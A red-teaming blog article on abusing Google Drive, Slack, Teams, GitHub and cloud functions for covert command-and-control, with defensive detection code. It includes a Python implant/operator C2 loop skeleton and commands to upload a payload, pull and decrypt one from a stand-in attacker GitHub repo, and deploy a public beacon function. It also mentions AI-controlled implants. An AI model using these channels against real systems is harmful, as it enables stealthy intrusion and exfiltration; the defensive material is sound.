Living Off the Cloud: Abusing Cloud Services for Red Teaming
Modern cyber threats use "Living Off the Cloud" (LOTC) techniques, abusing trusted cloud services such as Google Drive, Slack and GitHub for stealthy attacks. These services make ideal tools because they are widely trusted, encrypted in transit and hard to block. Attackers distribute malicious payloads through shared folders and use cloud functions for persistent control. Defenders need to monitor anomalous activity and API usage and enable audit logging to counter this emerging threat. 2025-8-4 04:46:26 Author: infosecwriteups.com Reads: 29

Cyber threats today no longer rely on flashy malware or sketchy infrastructure. Modern adversaries, especially Advanced Persistent Threats (APTs), are turning to trusted cloud services to operate invisibly. This technique is called Living Off The Cloud (LOTC), and it is rapidly becoming a staple of Red Team and nation-state toolkits.

Just like Living Off the Land (LOTL) involves using native OS tools, LOTC uses cloud-based infrastructure you probably already trust.

Cloud services are:

  • Widely used and trusted: Firewalls and proxies often allow their traffic.
  • Encrypted by default: Most use HTTPS, making inspection harder.
  • Hard to blacklist: You can’t just block Google or Microsoft in most organizations.
  • Globally available: Attackers don’t need infrastructure, just an account.

Command and Control via Google Drive or Dropbox

TTP Flow:

  • Attacker drops payloads into shared cloud folder.
  • Infected host polls folder every 30s via scheduled task or beacon.
  • Exfiltrated data (e.g., screenshots, keystrokes) uploaded as new files.

Tools:

  • Sliver + Google Drive API
  • gdrive: CLI for file uploads/downloads
gdrive upload C2_payload.exe                 # operator side: push the file into the shared folder
gdrive download --path /tmp <fileId>         # implant side: fetch tasking.json by its Drive file ID (gdrive downloads by ID, not by name)

Why it works: Google Drive traffic blends in with normal productivity behavior.

Slack or Microsoft Teams as C2 Channels

TTP Flow:

  • Slack bot posts commands in a private channel.
  • Compromised endpoints poll the channel and execute the commands.
  • Output posted back as messages.
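The poll, execute and post-back loop that both the Google Drive/Dropbox section and this Slack/Teams section describe, as an added example that is not part of the original article and is not code from Sliver, gdrive or any PoC named on this page. The cloud side is a constructed in-memory FakeDrive that stands in for a shared folder or a chat channel; a real implant would replace its four methods with Drive, Dropbox or Slack API calls and keep the rest. The tasking file layout, the JSON message shapes and the task names are assumptions made for the example.

```python
import json
import os
import random
import time
import uuid


# Constructed stand-in for the cloud side: a shared Drive/Dropbox folder or a
# Slack/Teams channel reduced to a flat name -> bytes store. A real implant
# would back these four calls with the provider's API (for Drive: files.list,
# files.get, files.create, files.delete); the flow below stays the same.
class FakeDrive:
    def __init__(self):
        self.files = {}

    def upload(self, name, data):
        self.files[name] = data

    def download(self, name):
        return self.files.get(name)

    def list(self, prefix=""):
        return sorted(n for n in self.files if n.startswith(prefix))

    def delete(self, name):
        self.files.pop(name, None)


# Task dispatch table (assumed for the example). Tasks are Python callables
# rather than shell commands so the demo is harmless to run.
TASKS = {
    "cwd": lambda *args: os.getcwd(),
    "echo": lambda *args: " ".join(args),
}


class Operator:
    """Attacker side: drops one tasking file per implant, collects results."""

    def __init__(self, drive):
        self.drive = drive

    def task(self, implant_id, cmd, *args):
        task_id = uuid.uuid4().hex
        body = {"id": task_id, "cmd": cmd, "args": list(args)}
        self.drive.upload(f"tasking/{implant_id}.json", json.dumps(body).encode())
        return task_id

    def collect(self, implant_id):
        results = []
        for name in self.drive.list(f"results/{implant_id}/"):
            results.append(json.loads(self.drive.download(name)))
            self.drive.delete(name)          # consume so it is not read twice
        return results


class Implant:
    """Victim side: polls for its tasking file, runs it, uploads the output."""

    def __init__(self, drive, implant_id):
        self.drive = drive
        self.id = implant_id

    def poll_once(self):
        name = f"tasking/{self.id}.json"
        blob = self.drive.download(name)
        if blob is None:
            return None                       # nothing queued this round
        task = json.loads(blob)
        self.drive.delete(name)               # acknowledge by removing the tasking file
        handler = TASKS.get(task["cmd"])
        if handler is None:
            result = {"id": task["id"], "status": "unknown-task"}
        else:
            result = {"id": task["id"], "status": "ok",
                      "output": handler(*task.get("args", []))}
        self.drive.upload(f"results/{self.id}/{task['id']}.json",
                          json.dumps(result).encode())
        return result

    def run(self, interval=30, jitter=0.2, max_polls=None):
        """Beacon loop: sleep interval +/- jitter between polls. A fixed 30 s
        cadence is exactly what timing analysis on the defender side keys on;
        jitter only blurs it, it does not remove the periodicity."""
        polls = 0
        while max_polls is None or polls < max_polls:
            self.poll_once()
            polls += 1
            time.sleep(interval * (1 + random.uniform(-jitter, jitter)))


if __name__ == "__main__":
    drive = FakeDrive()
    operator, implant = Operator(drive), Implant(drive, "host-A")
    operator.task("host-A", "echo", "hello from the cloud")
    implant.poll_once()
    print(operator.collect("host-A"))
```

Note that every message in this exchange is an ordinary file create/read/delete (or chat post) against the provider's API over HTTPS, which is why the traffic looks like productivity use to a proxy; the only artefacts that distinguish it are the regular cadence and the fact that the same account keeps touching the same small set of objects.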

Abuse Example:

Slack webhook: https://hooks.slack.com/services/XXXX/YYYY/ZZZZ

GitHub PoC:

  • slack-shell
  • TeamC2: C2 over Microsoft Teams

Reference:

In August 2023 Microsoft reported that APT29 (Midnight Blizzard) sent Microsoft Teams chat messages from previously compromised tenants, posing as technical support, to socially engineer targets into approving MFA prompts and giving up credentials.

Bonus: Many orgs run Slack in-browser or as a native app, so once again the traffic is trusted.

Payload Hosting via GitHub Repositories

GitHub repositories (public or private) can host:

  • Encrypted payloads or scripts
  • Infrastructure-as-code (IaC) templates for dynamic infrastructure.
  • Configuration files used by implants
  • All of it delivered over HTTPS from GitHub's own CDN (e.g., raw.githubusercontent.com)

Tool Example:

  • gitC2: C2 over GitHub repos.
git clone https://github.com/attacker/payloads.git   # implant pulls the repo like any developer would
cd payloads
gpg --decrypt --output payload.bin payload.bin.gpg   # payload is only decryptable with the key the implant carries

Persistence via Cloud Functions

Cloud functions allow event-driven execution in the cloud. Perfect for stealthy persistence.

Platforms:

  • AWS Lambda
  • Google Cloud Functions
  • Azure Functions

Red Team Use:

  • Trigger C2 beacon on HTTP request
  • Inject shellcode into warm function containers
  • Auto-deploy second-stage payloads
gcloud functions deploy beacon --runtime python39 --trigger-http --allow-unauthenticated   # public HTTP endpoint so implants need no Google identity to reach it

Defending against LOTC is challenging, but not impossible. Here’s what Blue Teams and defenders should be doing:

Monitor for Anomalous Cloud Service Use

  • OAuth token abuse: Unknown apps with high permissions
  • Personal cloud storage: Used from corporate devices
  • API usage spikes: Especially to Slack, GitHub, Dropbox

Inspect DNS and HTTPS Metadata

Even if payloads are encrypted, patterns like the following still stand out:

  • Repeated traffic to non-standard subdomains
  • Odd timing patterns (e.g., beaconing every 30s)
  • Known cloud URLs used in unusual ways
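The timing signal from the list above, worked through in code: an added example, not code from the original article or from any vendor tool. It parses a constructed egress-proxy log (timestamp, source IP, destination host, bytes; every line is made up) and flags source/destination pairs whose inter-request gaps are nearly constant, which is what a scheduled-task or beacon poller looks like even when every request is a legitimate-looking HTTPS call to googleapis.com. The thresholds are assumptions to tune per environment.

```python
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed proxy/egress log: "<UTC timestamp> <src IP> <destination host> <bytes>".
# 10.0.0.5 polls a Drive API host every 30 s (+/- 1 s); 10.0.0.7 is a person
# using Slack; 10.0.0.9 touched Dropbox three times. Every line is made up.
SAMPLE_LOG = """\
2025-08-04T09:00:00Z 10.0.0.5 www.googleapis.com 1412
2025-08-04T09:00:30Z 10.0.0.5 www.googleapis.com 1408
2025-08-04T09:01:01Z 10.0.0.5 www.googleapis.com 1412
2025-08-04T09:01:30Z 10.0.0.5 www.googleapis.com 1412
2025-08-04T09:02:00Z 10.0.0.5 www.googleapis.com 1409
2025-08-04T09:02:31Z 10.0.0.5 www.googleapis.com 1412
2025-08-04T09:03:00Z 10.0.0.5 www.googleapis.com 1412
2025-08-04T09:03:30Z 10.0.0.5 www.googleapis.com 1410
2025-08-04T09:04:01Z 10.0.0.5 www.googleapis.com 1412
2025-08-04T09:04:30Z 10.0.0.5 www.googleapis.com 1412
2025-08-04T09:00:05Z 10.0.0.7 slack.com 8831
2025-08-04T09:00:09Z 10.0.0.7 slack.com 2210
2025-08-04T09:02:44Z 10.0.0.7 slack.com 15022
2025-08-04T09:03:10Z 10.0.0.7 slack.com 640
2025-08-04T09:07:59Z 10.0.0.7 slack.com 9921
2025-08-04T09:08:01Z 10.0.0.7 slack.com 330
2025-08-04T09:15:30Z 10.0.0.7 slack.com 4010
2025-08-04T09:16:02Z 10.0.0.7 slack.com 1275
2025-08-04T09:21:45Z 10.0.0.7 slack.com 7700
2025-08-04T09:05:00Z 10.0.0.9 dl.dropboxusercontent.com 240011
2025-08-04T09:05:30Z 10.0.0.9 dl.dropboxusercontent.com 240011
2025-08-04T09:06:00Z 10.0.0.9 dl.dropboxusercontent.com 240011
"""


def parse_log(text):
    """Turn the constructed log format into (datetime, src, dst, bytes) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, size = line.split()
        events.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), src, dst, int(size)))
    return events


def find_beacons(events, min_events=8, max_cv=0.15, max_interval=600):
    """Flag (src, dst) pairs whose inter-request gaps are nearly constant.
    cv = stdev / mean of the gaps: close to 0 for a fixed-interval poller,
    around 1 for human-driven browsing. min_events keeps one-off bursts from
    scoring; max_interval ignores slow, long-period jobs (tune both locally)."""
    by_pair = defaultdict(list)
    for ts, src, dst, size in events:
        by_pair[(src, dst)].append((ts, size))
    hits = []
    for (src, dst), seen in by_pair.items():
        if len(seen) < min_events:
            continue
        seen.sort()
        gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(seen, seen[1:])]
        mean = statistics.mean(gaps)
        if mean == 0 or mean > max_interval:
            continue
        cv = statistics.pstdev(gaps) / mean
        if cv <= max_cv:
            sizes = [s for _, s in seen]
            hits.append({
                "src": src, "dst": dst, "count": len(seen),
                "mean_interval": round(mean, 2), "cv": round(cv, 3),
                # near-identical response sizes are a second tell: an empty
                # "no tasking yet" poll returns the same bytes every time
                "size_spread": max(sizes) - min(sizes),
            })
    return hits


if __name__ == "__main__":
    for hit in find_beacons(parse_log(SAMPLE_LOG)):
        print(hit)
```

Against the sample log only the 10.0.0.5 to www.googleapis.com pair scores (mean gap 30 s, cv about 0.03, response sizes within 4 bytes); the Slack user's gaps vary by an order of magnitude and are ignored. Jittered implants raise the cv, so in practice run this over long windows and pair it with the size-spread and with who else in the fleet talks to that destination.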

Log Everything You Can

  • Enable audit logs on cloud platforms (e.g., Google Workspace, M365)
  • Monitor file sharing activity and access patterns.
  • Look for out-of-place automation, like rogue bots, unknown Lambda functions and GitHub webhook abuse.
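One way to act on the "OAuth token abuse: unknown apps with high permissions" item and on the audit-log advice above, as an added example that is not part of the original article. It reviews constructed, simplified OAuth token-grant events of the kind a Google Workspace token audit log records (the real events carry more fields; the user, event, client_id, app_name and scopes fields here are the ones the check needs) and reports grants of sensitive scopes to apps that are not on an allowlist. The scope list, the allowlist and every event are assumptions made for the example.

```python
import json

# Scopes that hand an app the reach an implant wants (assumed list; extend
# for your tenant). Keys are Google OAuth scope URIs, values are plain labels.
SENSITIVE_SCOPES = {
    "https://www.googleapis.com/auth/drive": "full Drive read/write",
    "https://www.googleapis.com/auth/gmail.readonly": "read all mail",
    "https://www.googleapis.com/auth/admin.directory.user": "manage users",
}

# OAuth client IDs the org has vetted (assumed allowlist).
APPROVED_CLIENTS = {"1234567890-approved.apps.googleusercontent.com"}

# Constructed token-audit events, one JSON object per line, simplified shape.
SAMPLE_EVENTS = """\
{"time": "2025-08-04T08:12:03Z", "user": "alice@example.com", "event": "authorize", "client_id": "1234567890-approved.apps.googleusercontent.com", "app_name": "Approved Notetaker", "scopes": ["https://www.googleapis.com/auth/drive.file"]}
{"time": "2025-08-04T08:40:11Z", "user": "bob@example.com", "event": "authorize", "client_id": "987654321-unknown.apps.googleusercontent.com", "app_name": "PDF Helper", "scopes": ["https://www.googleapis.com/auth/drive", "https://www.googleapis.com/auth/gmail.readonly"]}
{"time": "2025-08-04T09:02:51Z", "user": "carol@example.com", "event": "authorize", "client_id": "987654321-unknown.apps.googleusercontent.com", "app_name": "PDF Helper", "scopes": ["https://www.googleapis.com/auth/drive"]}
{"time": "2025-08-04T09:15:00Z", "user": "dave@example.com", "event": "revoke", "client_id": "987654321-unknown.apps.googleusercontent.com", "app_name": "PDF Helper", "scopes": []}
{"time": "2025-08-04T09:30:00Z", "user": "erin@example.com", "event": "authorize", "client_id": "555-calendar.apps.googleusercontent.com", "app_name": "Calendar Sync", "scopes": ["https://www.googleapis.com/auth/calendar.readonly"]}
"""


def parse_events(text):
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def review_grants(events, sensitive=SENSITIVE_SCOPES, approved=APPROVED_CLIENTS):
    """Return one finding per authorize event that grants at least one
    sensitive scope to a client that is not on the allowlist. Revocations and
    narrow scopes (drive.file, calendar.readonly) are not findings."""
    findings = []
    for ev in events:
        if ev.get("event") != "authorize" or ev["client_id"] in approved:
            continue
        labels = [sensitive[s] for s in ev.get("scopes", []) if s in sensitive]
        if labels:
            findings.append({
                "time": ev["time"], "user": ev["user"],
                "client_id": ev["client_id"], "app_name": ev["app_name"],
                "sensitive": labels,
            })
    return findings


def summarize(findings):
    """Roll findings up per client: the same unknown app collecting Drive
    access from several users is the pattern behind a consent-phishing
    campaign, and is worth more attention than a single grant."""
    per_client = {}
    for f in findings:
        entry = per_client.setdefault(f["client_id"], {"app_name": f["app_name"], "users": set()})
        entry["users"].add(f["user"])
    return {cid: {"app_name": e["app_name"], "users": len(e["users"])}
            for cid, e in per_client.items()}


if __name__ == "__main__":
    found = review_grants(parse_events(SAMPLE_EVENTS))
    for f in found:
        print(f"{f['time']} {f['user']} granted {f['app_name']}: {', '.join(f['sensitive'])}")
    print(summarize(found))
```

Once an app like the one flagged here is confirmed unwanted, the fix is tenant-side (revoke the grants and block the client ID in the admin console), not endpoint-side: the implant never needs to touch the victim's machine again once it holds a refresh token for full Drive access.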

Analyze DNS + HTTPS Metadata

Even if payloads are encrypted, behaviours reveal intent. (The original article illustrated this with two tables of example behaviours that were embedded as images and are not reproduced here.)

With the rise of GenAI and cloud services, imagine:

  • GPT-generated phishing via Microsoft 365
  • Dynamic payload generation hosted on GitHub Actions
  • AI-controlled implants communicating via AI API (e.g., OpenAI, Anthropic)

Simulated Red Team scenario using cloud-based C2

Check out:

  • Mythic C2 Framework
  • Sliver C2
  • Red Canary's Atomic Red Team Cloud TTPs

Source: https://infosecwriteups.com/living-off-the-cloud-abusing-cloud-services-for-red-teaming-bf83fae9acae?source=rss----7b722bfd1b8d---4